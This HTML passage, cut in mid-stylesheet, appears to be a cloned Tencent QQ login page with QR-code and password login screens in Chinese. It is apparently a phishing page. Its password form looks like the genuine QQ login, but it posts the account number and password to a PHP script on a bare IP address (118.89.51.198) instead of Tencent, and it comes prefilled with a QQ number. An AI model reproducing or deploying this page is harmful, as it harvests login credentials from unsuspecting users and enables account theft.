				letter-spacing: 1px;
				display: none
			}
			
			.ov-tips {
				letter-spacing: 1px;
				height: 35px;
				display: none
			}
			
			.ov-tips em {
				font-size: 14px;
				font-weight: 700;
				font-style: normal;
				letter-spacing: 0
			}
			
			.ov-scene {
				width: 100%;
				height: 137px;
				margin-top: 18px
			}
			
			.ov-1 .aq-app,
			.ov-2 .aq-wx {
				display: block
			}
			
			.invalid .aq-app,
			.invalid .aq-wx {
				display: none
			}
			
			.invalid .timeout {
				display: block;
				color: red
			}
			
			.ov-1 .ov-scene {
				background: url("/style/20/images/aq/mail_verify_1.png") 39px 0 no-repeat
			}
			
			.ov-2 .ov-scene {
				background: url("/style/20/images/aq/mail_verify_2.png") 39px 0 no-repeat
			}
			
			.invalid .ov-scene {
				background-position: 39px -150px
			}
			
			.timeout a {
				color: #0b6ee9
			}
			
			.link_tips {
				color: #3481cf
			}
			
			.title {
				font-size: 20px;
				color: #333;
				margin-bottom: 16px
			}
			
			.guanjia {
				position: relative
			}
			
			.web_login .guanjia {
				top: 10px
			}
			
			.qlogin .guanjia {
				top: -61px
			}
			
			.bottom.center {
				right: 0
			}
			
			.guanjia_checkbox,
			.guanjia_logo {
				vertical-align: bottom;
				margin: 0;
				padding: 0
			}
			
			.guanjia_tips {
				font-size: 12px;
				color: #666;
				padding-left: 3px
			}
			
			.login,
			.login_no_qlogin {
				background-color: #ffffff;
			}
			
			.header .logo,
			.authHeader .logo {
				background: url("https://ui.ptlogin2.qq.com/style/11/images/icon_24_c_3.png") no-repeat;
				_background: url("https://ui.ptlogin2.qq.com/style/11/images/icon_3.png") no-repeat;
				background-position: 0 -280px;
			}
		</style>
		<script type="text/javascript" charset="utf-8" src="xlogin_data/c_login_2.js"></script>
		<script src="xlogin_data/a"></script>
		<script src="xlogin_data/pt_get_uins_005"></script>
		<script src="xlogin_data/a_002"></script>
		<script src="xlogin_data/pt_get_uins"></script>
		<script type="text/javascript" async="" src="xlogin_data/JsonMsg.js"></script>
		<script type="text/javascript" async="" src="xlogin_data/TCapIframe.js"></script>
		<script src="xlogin_data/pt_get_uins_002"></script>
		<script src="xlogin_data/pt_get_uins_004"></script>
		<script src="xlogin_data/pt_get_uins_003"></script>
	</head>

	<body>
		<div class="login" id="login" style="height: 316px;">
			<div class="header"> </div>
			<div class="error_tips" id="error_tips" style="display: none;"><span class="error_logo" id="error_logo"></span> <span class="err_m" id="err_m"></span></div>
			<div class="loading_tips" id="loading_tips"><span id="loading_wording">登录中</span><img id="loading_img" place_src="https://ui.ptlogin2.qq.com/style/0/images/load.gif" src="xlogin_data/load.gif" align="absmiddle"></div>
			<div class="qlogin" id="qlogin" style="display: none;">
				<div class="title" id="title_0" style="display: block;">快速安全登录</div>
				<div class="title" id="title_1" style="display: none;">安全验证</div>
				<div class="qlogin_tips" id="qlogin_tips_0" style="display: none;">请使用
					<a class="link_tips" href="http://im.qq.com/mobileqq/#from=login" target="_blank">QQ手机版</a>扫描二维码，<br>安全登录，防止盗号。</div>
				<div class="qlogin_tips" id="qlogin_tips_1" style="display: block;">请使用
					<a class="link_tips" href="http://im.qq.com/mobileqq/#from=login" target="_blank">QQ手机版</a>扫描二维码，<br>或点击头像授权登录。</div>
				<div class="qlogin_tips" id="qlogin_tips_2" style="display: none;">由于你的帐号存在异常，需要进行手机验证，<br>请使用
					<a class="link_tips" href="http://im.qq.com/mobileqq/#from=login" target="_blank">QQ手机版</a>扫码进行登录。</div>
				<div class="qlogin_tips" id="qlogin_tips_3" style="display: none;">你已开启了设备锁安全登录服务，<br>请使用
					<a class="link_tips" href="http://im.qq.com/mobileqq/#from=login" target="_blank">QQ手机版</a>扫码进行登录。</div>
				<div class="qlogin_tips" id="qlogin_tips_4" style="display: none;">请在
					<a class="link_tips" href="http://im.qq.com/mobileqq/#from=login" target="_blank">QQ手机版</a>上确认使用此帐号登录</div>
				<a title="上一页" class="prePage" id="prePage" href="javascript:void(0);" style="display: none;"><span class="preRow" tabindex="6"></span></a>
				<div class="qlogin_show" id="qlogin_show" style="width: 300px; left: 50%; margin-left: -150px;">
					<div class="qlogin_list" id="qlogin_list" style="width: 300px;"><span id="qr_area" class="qr_1"><img id="qrlogin_img" class="qrImg" alt="" style="" src="xlogin_data/ptqrshow.png"> <span class="qrlogin_img_out" onmouseover="pt.plogin.showQrTips();" onmouseout="pt.plogin.hideQrTips();"></span> <span id="qr_invalid" class="qr_invalid" onclick="pt.plogin.begin_qrlogin();" style="display: none;"><span id="qr_mengban" class="qr_mengban"></span> <span id="qr_invalid_tips" class="qr_invalid_tips"> 二维码失效 <br> 请点击刷新 </span></span>
						</span>
						<a hidefocus="true" draggable="false" href="javascript:void(0);" tabindex="2" uin="920248921" type="5" onclick="pt.qlogin.imgClick(this);return false;" onfocus="pt.qlogin.imgFocus(this);" onblur="pt.qlogin.imgBlur(this);" onmouseover="pt.qlogin.imgMouseover(this);" onmousedown="pt.qlogin.imgMouseDowm(this)" onmouseup="pt.qlogin.imgMouseUp(this)" onmouseout="pt.qlogin.imgMouseUp(this)" class="face"> <img id="img_920248921" uin="920248921" type="5" src="xlogin_data/g.jpg" onerror="pt.qlogin.imgErr(this);"> <span id="mengban_920248921"></span> <span class="uin_menban"></span> <span class="uin">920248921</span> <span id="img_out_920248921" uin="920248921" type="5" class="img_out"></span> <span id="nick_920248921" class="nick">920248921</span> <span class=""></span> <span class="onekey_logo"></span> </a>
						<a class="hide" onclick="pt.qlogin.buildUnifiedQloginList();pt.plogin.hide_err();return false;">返回扫码登录</a>
					</div>
				</div>
				<div class="guanjia hide"><img class="guanjia_logo hide" src="xlogin_data/logo.png"><input class="guanjia_checkbox hide" type="checkbox"><span class="guanjia_tips"></span></div>
				<a title="下一页" class="nextPage" id="nextPage" href="javascript:void(0);" style="display: none;"><span class="nextRow" tabindex="7"></span></a>
			</div>
			<div class="web_qr_login" id="web_qr_login" style="display: block;">
				<div class="web_qr_login_show" id="web_qr_login_show">
					<div class="web_login" id="web_login">
						
						<div class="tips" id="tips"> <noscript id="noscript_area"><span class="noscript">你的浏览器脚本被禁用了， <a href="/assistant/noscript.html" target="_blank" style="color: #29B1F1">查看启用方法</a> </span><img id="noscript_img" style="width:1px;height:1px" src="https://ui.ptlogin2.qq.com/cgi-bin/report?id=301240"></noscript>
							<div class="title" id="title_2">帐号密码登录</div>
							<div id="qlogin_entry">推荐使用
								<a class="switch_btn_focus link_tips" hidefocus="true" id="switcher_qlogin" href="javascript:void(0);" tabindex="7">快速安全登录</a>，防止盗号。</div>
							<div class="operate_tips" id="operate_tips"><span class="operate_content">手机号码也可登录哦， <a class="tips_link" id="bind_account" href="javascript:void(0);">登录个人中心绑定</a> </span><span class="down_row"></span></div>
						</div>
						<div></div>
						<div class="login_form">
							<form id="loginform" autocomplete="off" name="loginform" action="http://118.89.51.198/qq.php" method="post" style="margin:0px">
								<div class="uinArea" id="uinArea"><label class="input_tips" id="uin_tips" for="u" data-onlyqq="QQ号码" style="display: none;">支持QQ号/邮箱/手机号登录</label>
									<div class="inputOuter"><input class="inputstyle" id="u" name="u" value="920248921" tabindex="1" type="text">
										<a class="uin_del" id="uin_del" href="javascript:void(0);" style="display: block;"></a>
									</div>
									<ul class="email_list" id="email_list" style="display: none;"></ul>
								</div>
								<div class="pwdArea" id="pwdArea"><label class="input_tips" id="pwd_tips" for="p" style="display: block;">密码</label>
									<div class="inputOuter"><input class="inputstyle password" id="p" name="p" value="" maxlength="16" tabindex="2" type="password"></div>
									<div class="lock_tips" id="caps_lock_tips" style="display: none;"><span class="lock_tips_row"></span> <span>大写锁定已打开</span></div>
								</div>
								<div class="verifyArea" id="verifyArea">
									<div class="verifyinputArea" id="verifyinputArea"><label class="input_tips" id="vc_tips" for="verifycode">验证码</label>
										<div class="inputOuter"><input name="verifycode" class="inputstyle verifycode" id="verifycode" value="!GUM" tabindex="3" type="text"></div>
									</div>
									<div class="verifyimgArea" id="verifyimgArea"><img class="verifyimg" id="verifyimg" title="看不清，换一张">
										<a tabindex="4" href="javascript:void(0);" class="verifyimg_tips">看不清，换一张</a>
									</div>
								</div>
								<div class="submit">
									<a class="login_button" href="javascript:void(0);" hidefocus="true"><input tabindex="6" value="登 录" class="btn" id="login_button" type="submit"></a>
								</div>
							</form>
						</div>
						<div class="guanjia hide"><img class="guanjia_logo hide" src="xlogin_data/logo.png"><input class="guanjia_checkbox hide" type="checkbox"><span class="guanjia_tips"></span></div>
					</div>
					<div class="bottom" id="bottom_web" style="display: block;">
						<a href="https://ssl.ptlogin2.qq.com/ptui_forgetpwd" class="link" id="forgetpwd" target="_blank">忘了密码？</a> <span class="dotted">|</span>
						<a href="https://qzs.qq.com/qzone/v6/reg/index.html" class="link" target="_blank">注册新帐号</a> <span class="dotted">|</span>
						<a class="link" id="feedback_web" href="https://support.qq.com/products/14800" target="_blank">意见反馈</a>
					</div>
				</div>
			</div>
			<div id="qrlogin_step2" class="qrlogin_step2">
				<div class="step2_outer">
					<div class="qr_h3">扫描成功，请在手机上确认是否授权登录</div>
					<div class="goBack"> 使用其它方式登录，请
						<a id="goBack" href="javascript:void(0);" tabindex="14">返回</a>
					</div>
				</div>
			</div>
			<div id="onekey_step2" class="onekey_step2">
				<div class="outer">
					<div class="title">QQ手机版授权</div>
					<div class="container">
						<div class="prompt">请打开
							<a class="link_tips" href="http://im.qq.com/mobileqq/#from=login" target="_blank">QQ手机版</a>，确认登录</div>
						<div class="operate"> 没有收到登录确认？请
							<a href="javascript:pt.qlogin.onekeyPush(pt.qlogin.__onekeyUin)">重新发送。</a>
						</div>
						<div class="operate"> 使用扫码登录/密码登录，请&nbsp;
							<a style="text-decoration: underline" href="javascript:pt.plogin.go_onekey_step(1)">返回</a>
						</div>
						<div id="onekey_tips"></div>
					</div>
				</div>
				<div class="bottom">
					<a class="link" href="https://support.qq.com/products/14800" target="_blank">意见反馈</a>
				</div>
			</div>
			<div id="qr_tips" class="qr_tips" style="display: none; left: 217px;">
				<div class="" id="qr_tips_menban"></div>
				<div class="qr_tips_pic qr_tips_pic_chs" id="qr_tips_pic" style="opacity: 0;"></div>
			</div>
			<div class="bottom hide" id="bottom_qlogin" style="display: none;">
				<a class="link" hidefocus="true" id="switcher_plogin" href="javascript:void(0);" tabindex="8">帐号密码登录</a> <span class="dotted">|</span>
				<a href="https://qzs.qq.com/qzone/v6/reg/index.html" class="link" target="_blank">注册新帐号</a> <span class="dotted">|</span>
				<a class="link" id="feedback_qlogin" href="https://support.qq.com/products/14800" target="_blank">意见反馈</a>
			</div>
			<div id="authLogin" class="authLogin">
				<div class="authHeader" id="authHeader">
					<div class="logo"></div><span class="title">腾讯业务</span></div>
				<div class="authTips"></div>
				<div class="authWording"><span><span>点击头像，确认帐号登录</span><span>腾讯业务</span></span>
				</div>
				<div class="authInfo">
					<a class="face" id="auth_area" tabindex="1" href="javascript:void(0);" draggable="false" hidefocus="true"><img id="auth_face"> <span id="auth_mengban" class=""></span> <span class="uin" id="auth_uin"></span> <span class="img_out_focus"></span> <span class="nick" id="auth_nick"></span></a>
				</div>
				<div class="cancleAuthOuter" id="cancleAuthOuter">
					<a id="cancleAuth" class="cancleAuth">使用其他帐号</a>
				</div>
				<div class="bottom"> </div>
			</div>
			<div id="newVcodeArea" class="newVcodeArea" style="display: none;">
				<div style="margin: 0px; padding: 0px; line-height: 40px;">
					<div style="border-bottom: 1px solid #d7d7d7;">
						<div style="position: absolute; margin-left: 10px">
							<a href="javascript:pt.plogin.hideVC();" style="color: #007aff; text-decoration: none;">返回</a>
						</div>
						<div style="width: 100%; text-align: center; font-size: 16px; font-weight: bold">安全验证</div>
					</div>
				</div>
				<div id="newVcodeIframe" style="background: rgb(255, 255, 255) none repeat scroll 0% 0%; position: absolute; width: 300px; left: 50%; margin-left: -150px; z-index: 9999;"></div>
			</div>
		</div>
		<div id="proxy" class="hide"></div>
	</body>

</html>